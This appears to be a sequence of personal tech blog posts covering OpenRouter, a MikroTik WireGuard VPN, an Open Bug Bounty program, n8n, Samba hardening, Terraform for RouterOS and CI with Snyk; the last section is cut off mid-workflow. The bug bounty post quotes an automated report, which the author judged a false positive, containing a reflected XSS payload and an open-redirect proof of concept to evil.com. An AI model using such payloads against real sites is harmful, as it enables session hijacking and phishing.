Este ultimo tiempo por una cuestion de querer optimizar mis consumos, centralizar cosas y ver como puedo mejorar mi flujo, termine adoptando en su totalidad Openrouter si bien no es algo nuevo, aun para esta epoca sigue teniendo su encanto, siendo que podes centralizar todos tus consumos ahi, no tenes subscripciones y pagas por uso lo cual te have evaluar tus gastos y buscar modelos optimos para cada tarea, que si lo pensas para un sistema serio no le vas a tirar Opus 4.6 a todo lo que camina, entonces dependiendo la tarea podes empezar a buscar, entre benchmarks que hay en la misma pagina, precios y demas lo que mejor te convenga para lo que haces, sin contar que tienen su querido openrouter/free que si estas haciendo experimentos y si te dignas en leer su politica de ZDR, tenes alguna que otra cosita para usar.

Como aprovechar la plataforma

Gestion de API Keys

Primero que todo, vamos a empezar a crear apikeys en el panel que tiene

Siendo que mi caso es el de un individual (en un proximo blog voy a mostrar como gestionar uno para empresas)

Podemos crear por caso de uso, algo importante obvio para pensar desde siempre es poner un limitante, sea que fue una PoC algo que crees que vas a gastar centavos o demas es siempre crear una nueva apikey ya que si una de las que tenes se filtra por error primero

• Solo se va a filtrar esa apikey

• Tenes controlado por si alguien llega a consumirla para que no llegue a ser un gasto que afecte tu bolsillo (o controlarte vos mismo)

Dato importante de las keys, las mismas pueden incluir consumo de otras plataformas que tenemos

Donde BYOK significa Bring your own key, asi que si tenemos otras cositas podemos tambien centralizarlas aca.

Busqueda de modelos con buen rendimiento

Para esto podemos usar la parte de models y ordenar justamente por most popular esto significa que son los mejores? no pero viendo el uso de la pagina podemos asumir que los mas usados son la mezcla de el famoso bueno bonito y barato

Sobre todo cuando vemos la diferencia de consumo que hay, al dia de la fecha que escribo esto MiniMax M2.5 se encuentra primero hace tiempo por mas que se pueda ver que no es el #1 en varias categoria, esto muchas veces se ve afectado por el precio que tiene relacionado a sus benchmarks

0.089 USD x millon de tokens en average de input price es bajisimo, para contexto claude opus 4.6 actualmente tiene este coste promedio

Despues obviamente podemos ver muchisima informacion sobre ese modelo

Consumo centralizado

Si empezamos a probar y usar 200 cosas diferentes, crear apikeys, jugar y demas se va todo al corno si, pero es facil verlo desde la interfaz

Empezar a filtrar por apikey, modelo y todo lo que se te ocurra.

Manejo de privacidad

Posiblemente una de las cosas mas importantes, por que? y por que a algunas personas nos importa que hacen con nuestros datos, si bien sabemos que mientras mas control queremos la vida se vuelve menos practica y empezamos a sacrificar comodidades, para quien entiende lo que pasa por detras, es lindo tener un balance y poder vivir con comodidades, sin entregar tu vida digital al mejor postor.

Que tenemos en la plataforma? bastantes cositas que me terminaron resultando interesantes, primero vamos a tener una vista de disponibilidad respecto a que modelos vamos a poder usar en base a nuestra configuracion

Cuando empezemos a cambiar cosas vamos a ver que algunos no van a estar disponibles y nos va a dar una warning mencionando que politica viola este modelo en base a lo que le pedimos.

Un ejemplo

Por que se dio eso? por la siguiente politica

Tengase en cuenta que esto es propio de la cuenta (afecta a todas mis configuraciones) podemos despues segmentar mejor por apikey o demas.

Tambien tenemos configuraciones por provider, te cae mal OpenAI? bueno podes excluirlo por completo y dejarias de ver cualquier modelo que usa sus APIs

Ahora otra cosa importante, los guardrails. Como mencionamos antes las reglas mostradas hasta ahora son globales, aca podriamos aplicar de forma granular para poder segmentar mejor todo.

Que podemos modificar aca?, vamos a tener una vista de disponibilidad como antes

Como tambien la siguiente informacion

Donde aca tenemos lo siguiente

1. Informacion basica del guardrail para nombrarlo e identificarlo (name + description)

2. Budget, si bien podes enforzar limite por apikey, tambien lo podes hacer por guardrail.

3. Privacidad, hacer enforcement de ZDR

4. Modelos, que modelos vamos a poder usar y cuales no

5. Provedores, como mencionamos antes el que te caiga mal o no confias en lo absoluto se nos va

6. Informacion sensible, esto es importante ya que aca podemos empezar a definir que nos parece sensible a nosotros y redactar esa informacion en caso que decidamos enviarla

1. Por ultimo la apikey a quien afectaria este guardrail, como para poder agarrar grupos, casos de uso o cualquier cosa que se te ocurra.

Mencionamos varias veces ZDR, pero que es?

Primero que todo, para leer en detalle tenemos su documentacion

Ahora esto ya lo mencione 2 veces en lo que va el Blog pero es algo super importante, con palabras de ellos mismos

Zero Data Retention (ZDR) means that a provider will not store your data for any period of time.

OpenRouter has a setting that, when enabled, only allows you to route to endpoints that have a Zero Data Retention policy.

Providers that do not retain your data are also unable to train on your data. However we do have some endpoints & providers who do not train on your data but do retain it (e.g. to scan for abuse or for legal reasons). OpenRouter gives you controls over both of these policies.

Que pasa aca? bueno que un endpoint que tenga ZDR significa que no van a usar nuestros datos de input/output para entrenar modelos, ni tampoco retenerlo en sus logs, similar a los servicios de VPN que tienen su No Log Policy para mas cuestiones sobre VPN recomiendo el siguiente recurso

Ahora otra cosa interesante es como trabajan ellos, poniendose en contacto con los provedores para establecer esta ZDR y en caso que no puedan llegar a un acuerdo mencionan lo siguiente

If OpenRouter is not able to establish or ascertain a clear policy for a provider or endpoint, we take a conservative stance and assume that the endpoint both retains and trains on data and mark it as such.

Que significa esto? que cualquiera que no quiera dar la informacion que tiene que dar, es catalogado como alguien de desconfianza y podemos asumir que retiene logs o entrena con nuestros prompts.

Conclusion

Si bien quedan cosas por mirar, hasta este punto siento que cualquiera (como vengo haciendo yo) le puede sacar bastante provecho a la plataforma, economizando costos, centralizando consumos para no andar gastando de mas y cuidando sus datos cuando se requiera.

La plataforma tiene una muy buena developer experience en ese caso haciendo todo bastante facil, recomiendo pegarle una mirada.

Requirements

• Basic networking knowledge

• Mikrotik Router with RouterOS 7+

• Access to your ISP Router (Optional)

Understand your network

Why I’m saying this? because things could change depending on the state of your network, I’m my case I have the router of the ISP and the mikrotik one and since I’m not doing a bridge, I have 2 networks in the home, which I don’t use one of them (the ISP one) but I have to port forward things from it into the mikrotik when I’m trying to expose things to the internet.

So what about your case? well if you are using your mikrotik with the ISP one and doing a bridge, you could probably skip the port forwarding thing since you manage everything from mikrotik and the ISP one is only giving internet and becomes a brick.

As for hardware itself I’m using

• https://mikrotik.com/product/hap_ac2

Prepare your router/s

If everything is already plug in the way you want, go ahead and access each of them at least for the first time, in case you want to do a bridge configuration I’m not covering this topic here :)

ISP Router

• Check if you have access to it, how? https://www.wikihow.com/Access-a-Router

Mikrotik

• If you have little to no experience I’ll suggest that you use https://help.mikrotik.com/docs/spaces/ROS/pages/328129/WinBox but access at least for the first time.

• You can try to enter with creds “admin:" which means admin and no password, else https://help.mikrotik.com/docs/spaces/RKB/pages/285147143/Default+password

If you routeros version is below <7 we are going to need an update.

If case you need to update it you can go into System > Packages and there you go, It may be needed to use channel Testing if you device is really old.

Configure wireguard your server

This section is quite simple, if we already have our RouterOS 7 a section regarding Wireguard should be there

Once we click it we can configure our server, which in the case of it the only fields that require change are these two

Name could be anything, port make sure is one free and pref from the 10-60k range, save it for later we are going to use it in our approach with 2 networks, the private key it auto generates so don’t worry.

This creates a new interface which we are going to use in our Address List in the next section.

Configure your address list

To do so, we are going to IP > Address and then click at New from that we can select a range and the interface that was generated from creating the Wireguard server before.

Once this is complete, this will also add a entry in the routing table located at IP > Routes

In case you want to read more about routing here is the docs https://help.mikrotik.com/docs/spaces/ROS/pages/328084/IP+Routing, also here a cool video about it https://www.youtube.com/watch?v=8qtKpZGoNdI

Configure your firewall

To go into this section we should click IP > Firewall

Now for the firewall we need a few things depending on what we want to archive, here I’m going to show a quick/simple example that forwards the traffic from the range we created before and also allowed in our entire network.

The rule needed for this particular configuration (one to accept everything coming from this range we created)

Accept - Input - Src. Address

Here we are saying, all of the traffic coming from 192.168.178.0/24 accept it into any dst address, protocol, port, etc.

Make sure this rule is ABOVE any other drop rule, or else your package will be lost. Now into the next section, we are going to see how to create a peer and connect into this network from outside our LAN

Port forwarding

Before creating our peer we are probably going to need a forward here :)

Login into your ISP router and create a rule to forward for the listening port that Wireguard is doing the listening (in this tutorial we were using 13231) for the protocol part TCP should be enough but I’ll enable both of them just in case.

That onto the ip address of your mikrotik using the IP generated from the ISP router, with this we are saying, hey handle request coming into my public ip from this port into this IP.

Create your first peer

Create the tunnel in Wireguard Android App

For this example I’m going to use my phone → https://play.google.com/store/apps/details?id=com.wireguard.android&hl=en-US

Once inside choose to create a new tunnel from zero, after that we will choose a name, type our address that we decided before and point our DNS server (if there is any private resolution, else just use 1.1.1.1 or 8.8.8.8

From here we are going to COPY THE PUBLIC KEY and use it in the Wireguard peer in mikrotik.

Configure the Peer in Mikrotik

Now it’s time to sync things from the mikrotik part, let’s go into Wireguard > Peers and create a new one

Here we need to use the public key we generated and copied in the previous step, in my case is iv39qZIHpWuGDNfSdt8TzMUzKtY8XEaTOH1fxh3alAA= for private key let’s use none for now, and in allowed address let’s type one for example 192.168.178.3/32 with this we should be ok for this part.

Now back into the android app, edit the tunnel we created before to add a peer, in the public key we need to use the one from the Wireguard instance we created way before (the one from the picture below)

For the Endpoint part we need our public ip (https://whatismyipaddress.com/) + the listen port we set when we created the wireguard instance (13231 in the picture above) so it’s going to be something like <IP>:<PORT> and for allowed ips for now let’s use 0.0.0.0/0.

End result should look like this in android →

Tunnel

• Name (Anything)

• Public Key (Auto generated here and copied into mikrotik peer)

• Address (the one we are going to live on)

• DNS Server (private one or 1.1.1.1)

Peer

• Public Key (The one from the wireguard instance in mikrotik)

• Allowed Ips (0.0.0.0/0)

• Endpoint (<PUBLIC_IP>:<PORT>)

There we go, now we could enable this and navigate in our network :), if done correctly up until now we should see some traffic going on

Here our device shouls activity and also mentions that we are connected via Wireguard.

Access your network

At this point with the wireguard client enabled we should be able to access our private network

It’s maybe not clear for you, but this resource is clearly internal and works only on my network, so with this I’m able to connect and handle things if there is an emergency :)

Conclusion

Wireguard could be a “Easy” (if you have a more clear understand of what are you doing not like me) to setup and use, I’ll highly recommended!! :)

Create your account

In order to create an account we must go to https://www.openbugbounty.org/

Next we click that

Here we can create our account

After that we should try to login

When you try to login you will receive a OTP code in your email

About creating a program in open bug bounty

Now with an account we can go into https://www.openbugbounty.org/claim-a-website/

These are the steps to create our program, inside preferences we can set our domains

To add a domain we need to have a security.txt, refer to https://securitytxt.org/ to obtain more information about that file in general.

From there just investigate the webpage and complete the other things yourself! Now I’m going into the next section which is not listed here in their webpage.

What happens after your program gets accepted/verified?

First of all you appear in the Recently started programs in the mainpage

What you expect after this usually is

• People tries to break stuff and report it to you

What you actually get

• A permanent horde of bots trying to break stuff that not even exists there (hope you have a waf or you are going to have a bad time, even worse if you are in a free tier of any kind)

Some automated reports? today I got something like this that after doing a quick check I noticed that was a false positive about something that don’t exist in my app.

Reported by: [REDACTED]

Critical Reflected XSS and High Open Redirect vulnerability discovered in the /auth/login endpoint via the unsanitized redirect parameter. The flaw resides in the Next.js React Server Components (RSC) payload.

A. VULNERABILITY 1: Critical XSS Injection (Sanitization Failure)

Impact: Cookie theft, session hijacking, or arbitrary script execution.

Steps to Reproduce (PoC):

Send a GET request with an XSS payload injected into the redirect parameter (using <script> or <img>):

GET /auth/login?redirect=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
Observation (Sanitization Failure): The server reflects the full, unencoded payload directly into the RSC response body (Content-Type: text/x-component).

The Smoking Gun (Proof of Execution Attempt):

Crucial Evidence: Despite potential CSP blocking alert(), the browser's console shows a technical execution failure directly linked to the injected URL.

Console Error: Uncaught ReferenceError: __name is not defined

Stack Trace Location: The error is traced back to the path: at login?redirect=%22%3E%3Cscript....

Conclusion: This proves that the injected string reached the execution phase (React Hydration/JS Parsing) and was treated as executable code by the browser, confirming a functional XSS vulnerability. (See attached image image_1f78c0.png).

B. VULNERABILITY 2: High Open Redirect (CWE-601)

Impact: Used for sophisticated phishing attacks by leveraging your trusted domain name.

Steps to Reproduce (PoC):

Use any external URL in the redirect parameter:

GET /auth/login?redirect=https://evil.com
Observation: The external URL is accepted and reflected in the RSC payload, leading to an external redirect.

Recommendation:

XSS Fix: Implement strict server-side input validation and encoding for the redirect parameter to prevent the injection of HTML tags into the RSC payload.

Open Redirect Fix: Restrict the redirect parameter to relative paths (/) or a strict, pre-approved allow-list of domains.

Suggestions before posting

• Clearly define the scope of testing.

• Implement a monitoring system to detect anomalous patterns and unreported traffic.

• Clearly state the exclusions (what not to break) and the program's official time zone.

• Establish rules/mechanisms to clearly identify participants from the bug bounty program.

• Develop strategies to mitigate/combat automated bot activity.

• Offer clear incentives and provide an easy submission process for researchers.

Conclusion

Have fun while your app breaks, but hey you are going to learn for sure :)

My idea before going into the field of n8n with LLMs it’s to build as many thing as possible (maybe not the best ones for everything adds up)

So after I was doing a side project I thought this may be a good use case to learn more

Case #1

The idea

What happens here is the example of a user going into the detail page of a game which gathers information about the game itself from different sources like

• thegamesdb

• metacritic

• youtube

with these 3 sources I build a simple but useful page for that specific game

The workflow

By itself the workflow it’s quite simple it only does some web scrapping (sorry) and parses information into a JSON then is going to be stored in the database and answer back to the frontend with the JSON.

There are some possible improvements like using the HTML Extractor node instead of doing regex validations to find elements in the HTML with Javascript

Other question to ask myself would be, the validation about if the game exists should be present in the workflow itself or in the frontend?

The end result

At the end I’m able to build this horrible but functional detail page for each of the games that are listed in the site, I could also use the scrapper to build a entire database of games with the entire content of thegamesdb and make some improvements (like adding videos of the metacritic like i’m doing rn)

Case #2

The idea

Idea is super simple, I have some devices/machines that are not running inside my proxmox cluster so what I usually do it’s backup them with n8n into the proxmox (in which I after save that “backup” machine into 3 external disks)

In this case I want to save my Retropie saves since I play some retro games there time to time.

The workflow

It uses a schedule trigger to weekly SSH into the machine, if is able to SSH we send a discord message saying “Backup for [MACHINE] will start” and then execute a command inside that machine (rsync) and answer with the message to discord again.

If is not able to do the backup it will send an alert to discord.

The end result

Having a centralized space to backup everything under proxmox native backup system + proxmox backup server, I don’t have to worry about backups anymore :)

Native

PBS

Conclusion

N8N it’s cool you should learn it (even if you are not going to use it for AI)

To get some ideas you can go into https://n8n.io/workflows/ and start playing with it :)

In the context of building an idea with a end goal (for example launching an app and have real users) you often think to stink in your comfort area and it makes sense, your baseline of quality is way higher, your iterations are also faster.

So what about if we decide to Build something to seek users as the objective while also learning technical stuff?

The conclusion: not a good combo I would say

The idea

This is quite straightforward, a hosting is not something that came up now, it’s an idea that has been around for quite a while and lot of people have their own or there is some of them quite well established so why this?

As for myself I like infrastructure and I thought to myself of the challenges that I’ve not faced enough is dealing with a lot of users myself so I thought running a hosting with few resources would be quite a challenge, the base idea was quite simple and I was not thinking to build anything custom but then a friend decided to join and make things bigger that they were in my head in the beginning.

So we decided to build a custom platform to handle the servers and the infra itself by ourselves (since he’s more dev than me and wanted to learn also infrastructure)

Current status

The tech stack

Here the first tradeoff began, since I’m more comfortable with infrastructure (specially on prem) we decided to cut cost and go mostly on prem on a VPS called MassiveGrid and handle things ourself, the frontend of the app we decided to do it in next since both of us have neither of skill there so Vibe coding was the way and agents have more context/knowledge in popular things.

For the backend we decided to go with Java + Spring boot, since the entity of the system itself seems to be related to OOP I’ll say (now I regret) why not Java? this also was not a bad idea in the beginning because my friend is comfortable with that stack.

I had way to confidence in myself that java would be easy but nope, I thought I could read code easily each implementation was not that easy so it took my time even with the help of LLM’s (also we had some implementations that neither of us could archive easily because of the java ecosystem itself)

Our objective

The base idea was to build a free tier (using our own pockets) to learn what it feels to have an actual product with real users (even if we were at a lost in terms of money) and if it went good start selling actual services for interested people.

Or at least to build the service and gift servers to communities and see how hard was to maintain them with little to none resources.

But most of it was to learn so in that point we keep our word and try to learn until the end.

What actually happen

We are taking more time than we expected (way more) it’s not something bad if the idea was only learning but if we were counting this with the idea of actually making money we already saw that the idea it’s expensive and hard while it not guaranties success.

At the middle of the development we thought what if we move to golang/node so we iterate faster? poor cursor it tried his best but failed miserably so java lives another day.

It was worth it?

Can’t tell until we finish! there are only a few features left until we finish the integrations and there start search for users, here’s still a few things cool to see (seek users and see how to retain them lol)

As far from know I’ll say that the experience itself is totally worth it trying to build something from the ground up, maybe at a technical level you think have you learn it a lot? nah but yes in others aspects which I value a lot in this field.

Conclusion

Building something from zero is fun but it takes time depending on the idea you are planning, make sure to have your priorities defined so you don’t leave projects without a finishing!!

As far for Mainhost the build continues, see you at release day!! (Hope it would be soon mueheh)

Like Wikipedia says Samba is a free software re-implementation of the SMB networking protocol.

Now what is the SMB protocol? well It’s a way of sharing files across devices in a network, simple as that.

❗Important ❗ for any case, always use SMBv3 for security purposes even in LAN workflows.

Requirements 📓

To follow this article you are going to need

• A linux computer (debian based)

• A few minutes of your life

Use cases for SAMBA 🤔

Well you can guess there is a lot of use cases but I’m going to tell you the ones that worked for me :)

Having to share files with someone who uses a Windows computer 🪟

I could use NFS since my complete house is unix based, but what about when a friend comes with his laptop and uses Windows? well things become tricky so I’ll rather have the Samba over NFS so they don’t have to loss their mental like myself.

Obsidian vault 💜

Although obsidian doesn’t sync in real time for each device once you open the vault from another devices changes are there so that’s fine for me because I’ll do most of the things in my desktop and If I want to continue from bed in the laptop the progress is going to be synced from there so it’s quite effective.

Keepass db 💚

Somewhat same case as Obsidian, having a keepass db could be a pain in the ass to keep up to date across multiple devices, so this way becomes quite simple and keeps being private which is the idea of using keepass right? if I want sync with other devices and use the cloud I’ll rather use Bitwarden.

Stateful services (dev) 🧑‍💻

Do you have an application in your infra that needs to store something locally in the computer? like pictures, documents and stuff? while mounting the share via CIFS won’t be the fastest solution it could work perfectly for your lab especially on DEV environments

In my case I have some personal API rest that I’ve built for learning purposes and it stores things locally so using a only computer is fine but since the app is in a cluster across multiple computers the state needs to be shared across all of them or else all of them should access the samba right? to read and write from there.

Install the samba server 🧰

To accomplish this we are going to follow this guide https://ubuntu.com/tutorials/install-and-configure-samba#1-overview

Since I mention earlier we are using a debian based box (ubuntu in this case) we are going to install it this way

sudo apt update -y
sudo apt install samba

Simple as that! :)

Check that samba is installed with

samba --version
Version X-Debian

Create a Share 🍕

To create a share we should first create a file in a directory, in my case I’m using the home of the user

mkdir /home/user/sambashare

After that we need to modify the smb.conf

sudo nano /etc/samba/smb.conf

Once editing the file we are going to add this at the bottom

[sambashare]
    comment = Example
    path = /home/username/sambashare
    read only = no
    browsable = yes

Where sambashare is the name of the share (could be anything)

Once that is done save the file and sudo service smbd restart to restart the service

Now it’s needed to create an user for the SMB

$ smbpasswd -help
When run by root:
    smbpasswd [options] [username]
otherwise:
    smbpasswd [options]

options:
  -L                   local mode (must be first option)
  -h                   print this usage message
  -s                   use stdin for password prompt
  -c smb.conf file     Use the given path to the smb.conf file
  -D LEVEL             debug level
  -r MACHINE           remote machine
  -U USER              remote username (e.g. SAM/user)
extra options when run by root or in local mode:
  -a                   add user
  -d                   disable user
  -e                   enable user
  -i                   interdomain trust account
  -m                   machine trust account
  -n                   set no password
  -W                   use stdin ldap admin password
  -w PASSWORD          ldap admin password
  -x                   delete user
  -R ORDER             name resolve order

## So we are going to do this
sudo smbpasswd -a <USER>
sudo smbpasswd -e <USER>

Secure the samba (optional) 🔐

Based on this article https://www.makeuseof.com/ways-to-secure-samba-server-on-linux/

We are going to at least ensure the followings for my case since usage is LAN only

• Encrypt the traffic

• Avoid the usage of SMBv1

• Ensure hosts base restrictions

• Restrict anonymous usage

To ensure that we are going to modify the same file as before /etc/samba/smb.conf

And in the [global] section make sure to include

[global]

## Browsing/Identification ###
   workgroup = WORKGROUP
   min protocol = SMB2
   restrict anonymous = 2
   hosts allow = 127.0.0.1 192.168.0.1/24
   hosts deny = 0.0.0.0/0
   smb encrypt = required
   server signing = mandatory

To ensure that traffic is being encrypted you can check it with

sudo smbstatus

Samba version X-Debian
PID     Username     Group        Machine                                   Protocol Version  Encryption           Signing
----------------------------------------------------------------------------------------------------------------------------------------
32393   username       group       192.168.X.X (ipv4:192.168.X.X:X) SMB3_11            AES-128-GCM          AES-128-CMAC

Service      pid     Machine       Connected at                     Encryption   Signing
---------------------------------------------------------------------------------------------
sambashare   32393   192.168.X.X Sun Jul 13 16:53:03 2025 -03      AES-128-GCM  AES-128-CMAC

No locked files

From there we can also see that we are not using SMBv1

Also if we scan with nmap for example we can see that signing is required

Also we can see that is not possible to access with no creds

To secure even more the SMB and get more ideas of possible attacks I’ll suggest you check

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html

Access the Share from linux 🐧

In ubuntu from your filemanager

In my case the NAS is the one we are looking for, in case the network part won’t find we can access it from the search far typing something like:

smb://<IP>/<SHARE> an example would be smb://192.168.0.5/sambashare

If is the first time we do it we have to authenticate

Remember here this is not your username, is the one created for the SMB/Share

After a successful login we can see our share mounted in the system and use it in applications

In case your FM can’t mount or access the share you will have to do it from the terminal

Ensure that you have cifs-utils installed, that the location to mount exists and to specify a version over 3.0 in order to use SMBv3

sudo mount -t cifs //<IP>/<SHARE> <LOCATION_TO_MOUNT> \
  -o user=USUARIO,password=PASSWORD,uid=$(id -u),gid=$(id -g),file_mode=0664,dir_mode=0775,ver=3.0

Conclusion 🏁

If you reach this means it means that your share must be working, congratz!! Hope you have a great day.

For any issue or suggestion you can contact me at https://links.jonathan.com.ar

So let’s integrate our changes via TF, at least locally not with the idea of GitOps (for now).

Requirements

• RouterOS v7.1beta4 or newer

• Another user with write permissions

• A self signed cert for the www-ssl service and root

• The service www-ssl enabled with a cert

Certificates

In case you are on that version, you don’t need to create the root one since it comes built in.

To create the www-ssl one let’s do the following, first ssh into your router or login via winbox, in the terminal type

/certificate

Inside there let’s do

/certificate> add name=root-cert common-name=root-cert key-usage=key-cert-sign,crl-sign
/certificate> add name=https-cert common-name=https-cert

With that we got our certificates created, now we need to sign them. Let’s do the following

/certificate> sign https-cert
  progress: done

/certificate> sign root-cert
  progress: done

Now let’s enable the web with ssl

/ip service
set www-ssl certificate=https-cert disabled=no

Terraform

Now it’s time to set up our terraform environment, about the provider we are going to use is this https://registry.terraform.io/providers/terraform-routeros/routeros/latest

Folder structure

In my case I like to build them like this (at least when is one environment)

🌳 terraform/
┣ 📁 config/
┃ ┣ 📄 .gitkeep
┃ ┗ 📄 router.tfvars
┣ 📁 router/
┃ ┣ 📄 provider.tf
┃ ┣ 📄 resources.tf
┃ ┗ 📄 variables.tf
┣ 📄 backend.tf
┣ 📄 resources.tf
┗ 📄 versions.tf

In the resources at root level there is something like this

variable "ROS_HOSTURL" {}
variable "ROS_USERNAME" {}
variable "ROS_PASSWORD" {}

module "router" {
  source       = "./router"
  ROS_HOSTURL  = var.ROS_HOSTURL
  ROS_USERNAME = var.ROS_USERNAME
  ROS_PASSWORD = var.ROS_PASSWORD
}

Since I’m using modules I create the variables that get injected at execution time via environment variables

Before doing any king of action remember to create your tf.vars file

The one used in this example has this structure

ROS_HOSTURL="https://<IP_MIKROTIK>"
ROS_USERNAME="<USER_WE_CREATED_BEFORE_WITH_WRITE_ACCESS>"
ROS_PASSWORD="<USER_PASSWORD>"

Running something like

terraform <action> -var-file=config/router.tfvars --auto-approve;

Inside the router module we would need the provider which it’s something like this

terraform {
  required_providers {
    routeros = {
      source = "terraform-routeros/routeros"
    }
  }
}

provider "routeros" {
  hosturl  = var.ROS_HOSTURL
  username = var.ROS_USERNAME
  password = var.ROS_PASSWORD
  insecure = true # this is needed because routeros is using self-signed certificates
}

In my case in resources Im just creating DNS so it’s quite simple

locals {
  ros_subdomains = [
    "...",
    "...",
    "...",
  ]
}

resource "routeros_dns_record" "subdomains" {
  for_each = toset(local.ros_subdomains)
  name     = "${each.key}.${var.ROS_BASE_DOMAIN}"
  cname    = var.ROS_BASE_DOMAIN
  type     = "CNAME"
  comment  = var.ROS_COMMENT_DEFAULT
}

And for the variables I’m using are this

variable "ROS_HOSTURL" {
  description = "RouterOS host URL"
  type        = string
  default     = "http://..."
}

variable "ROS_USERNAME" {
  description = "RouterOS username"
  type        = string
  default     = ""
  sensitive   = true
}

variable "ROS_PASSWORD" {
  description = "RouterOS password"
  type        = string
  default     = ""
  sensitive   = true
}

variable "ROS_BASE_DOMAIN" {
  description = "Base domain for DNS records"
  type        = string
  default     = "internal.jonathan.com.ar"
}

variable "ROS_COMMENT_DEFAULT" {
  description = "Default comment for RouterOS resources"
  type        = string
  default     = "Managed by Terraform"
}

I’ll like to add a comment on each resource managed via TF so I’ll remember later to not modify them manually.

Now we could init the project

Now I'm going to add a new DNS just to update my state and run a terraform plan

Now if I run terraform apply this would create the entry in my router.

We can check it out

And that’s it!

We got our terraform working with RouterOS :)

Destruction

In case you want to destroy everything you can just run terraform destroy

In this case I’m only going to cover the CI one, but with a lot of things, let’s start and see what we can do :)

Disclaimer: I’m going to use Github as platform to explain most of the things, but concepts are general and can be applied anywhere.

Testing

Here we have a lot of categories, depending on your need you could add

• Unit

• Integration

• End to end

• Performance

To read more about each one of these types (and more) I suggest you read about them here

https://www.geeksforgeeks.org/types-software-testing/

https://martinfowler.com/articles/practical-test-pyramid.html

Now let’s show a basic example on github actions

name: Docker Publish

on:
  workflow_dispatch:
  pull_request:
    branches: [ "develop", "master" ]
    paths:
      - 'src/**'
      - 'infra/docker/**'
      - 'infra/kubernetes/**'
      - '.github/workflows/publish.yml'
      - 'tests/**'
  push:
    branches: [ "develop", "master" ]
    paths:
      - 'src/**'
      - 'infra/docker/**'
      - 'infra/kubernetes/**'
      - '.github/workflows/publish.yml'
      - 'tests/**'

env:
  BRANCH_NAME: ${{ github.ref_name }}
  APP_NAME: infobae_api
  APP_VERSION: latest
  APP_DEV_VERSION: unstable
  AWS_ECR_REGISTRY: ${{ secrets.AWS_ECR_REGISTRY }}

jobs:

  test:
    permissions: 
      contents: read

    name: test
    runs-on: ubuntu-latest
    steps:

      - name: Checkout
        uses: actions/checkout@85e6279cec87321a52edac9c87bce653a07cf6c2

      - name: Set up Go
        uses: actions/setup-go@5a083d0e9a84784eb32078397cf5459adecb4c40
        with:
          go-version: 1.23.2

      - name: Test
        run: go test -v ./tests

Here I’m running a suite of tests each time there is a pull request at the develop/master branch, or at each push to develop/master

This is running these tests

https://github.com/jd-apprentice/infobae-api/blob/master/tests/main_test.go

A larger collection of tests can be seen here

https://github.com/jd-apprentice/waifuland-api/tree/master/tests

Audit

Now here it depends on the language or platform but we can use/see a few things, for example if we are using nodejs we can see a command like npm audit which may not be the best (https://overreacted.io/npm-audit-broken-by-design/) but is better than nothing in some cases.

In the case of github we can also use dependabot

We can use the manual one or automatic one

Sast

Sast comes from https://en.wikipedia.org/wiki/Static_application_security_testing

Same as DAST there is a LOT of tools so I’m only going to cover you, is up to you to investigate which one fits more your business needs.

A popular one could be https://snyk.io/

We can login with github and add a new project there

I’m going to use github to add the project

Once repository is selected

We should see our project there (I know it’s destroyed, I just started with this one sob sob)

It’s useful to set automatic fix pull request to C/H

It can be done in the Github integration section for the project itself.

We can use their extension to be able to see things earlier

Connect to your account

Now let’s say we want to add the scan process into our pipeline, with github we can find in the marketplace the github action for it

# This workflow uses actions that are not certified by GitHub.
# They are provided by a third-party and are governed by
# separate terms of service, privacy policy, and support
# documentation.

# A sample workflow which sets up Snyk to analyze the full Snyk platform (Snyk Open Source, Snyk Code,
# Snyk Container and Snyk Infrastructure as Code)
# The setup installs the Snyk CLI - for more details on the possible commands
# check https://docs.snyk.io/snyk-cli/cli-reference
# The results of Snyk Code are then uploaded to GitHub Security Code Scanning
#
# In order to use the Snyk Action you will need to have a Snyk API token.
# More details in https://github.com/snyk/actions#getting-your-snyk-token
# or you can signup for free at https://snyk.io/login
#
# For more examples, including how to limit scans to only high-severity issues
# and fail PR checks, see https://github.com/snyk/actions/

name: Snyk Security

on:
  push:
    branches: ["master" ]
  pull_request:
    branches: ["master"]

permissions:
  contents: read

jobs:
  snyk:
    permissions:
      contents: read # for actions/checkout to fetch code
      security-events: write # for github/codeql-action/upload-sarif to upload SARIF results
      actions: read # only required for a private repository by github/codeql-action/upload-sarif to get the Action run status
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Set up Snyk CLI to check for security issues
        # Snyk can be used to break the build when it detects security issues.
        # In this case we want to upload the SAST issues to GitHub Code Scanning
        uses: snyk/actions/setup@806182742461562b67788a64410098c9d9b96adb

        # For Snyk Open Source you must first set up the development environment for your application's dependencies
        # For example for Node
        #- uses: actions/setup-node@v4
        #  with:
        #    node-version: 20

        env:
          # This is where you will need to introduce the Snyk API token created with your Snyk account
          SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}

        # Runs Snyk Code (SAST) analysis and uploads result into GitHub.
        # Use || true to not fail the pipeline
      - name: Snyk Code test
        run: snyk code test --sarif > snyk-code.sarif # || true

        # Runs Snyk Open Source (SCA) analysis and uploads result to Snyk.
      - name: Snyk Open Source monitor
        run: snyk monitor --all-projects

        # Runs Snyk Infrastructure as Code (IaC) analysis and uploads result to Snyk.
        # Use || true to not fail the pipeline.
      - name: Snyk IaC test and report
        run: snyk iac test --report # || true

        # Build the docker image for testing
      - name: Build a Docker image
        run: docker build -t your/image-to-test .
        # Runs Snyk Container (Container and SCA) analysis and uploads result to Snyk.
      - name: Snyk Container monitor
        run: snyk container monitor your/image-to-test --file=Dockerfile

        # Push the Snyk Code results into GitHub Code Scanning tab
      - name: Upload result to GitHub Code Scanning
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: snyk-code.sarif

It looks like this, in my case I’m only going to use code scan so everything else if going to be deleted.

# This workflow uses actions that are not certified by GitHub.
# They are provided by a third-party and are governed by
# separate terms of service, privacy policy, and support
# documentation.

# A sample workflow which sets up Snyk to analyze the full Snyk platform (Snyk Open Source, Snyk Code,
# Snyk Container and Snyk Infrastructure as Code)
# The setup installs the Snyk CLI - for more details on the possible commands
# check https://docs.snyk.io/snyk-cli/cli-reference
# The results of Snyk Code are then uploaded to GitHub Security Code Scanning
#
# In order to use the Snyk Action you will need to have a Snyk API token.
# More details in https://github.com/snyk/actions#getting-your-snyk-token
# or you can signup for free at https://snyk.io/login
#
# For more examples, including how to limit scans to only high-severity issues
# and fail PR checks, see https://github.com/snyk/actions/

name: Snyk Security

on:
  push:
    branches: ["master" ]
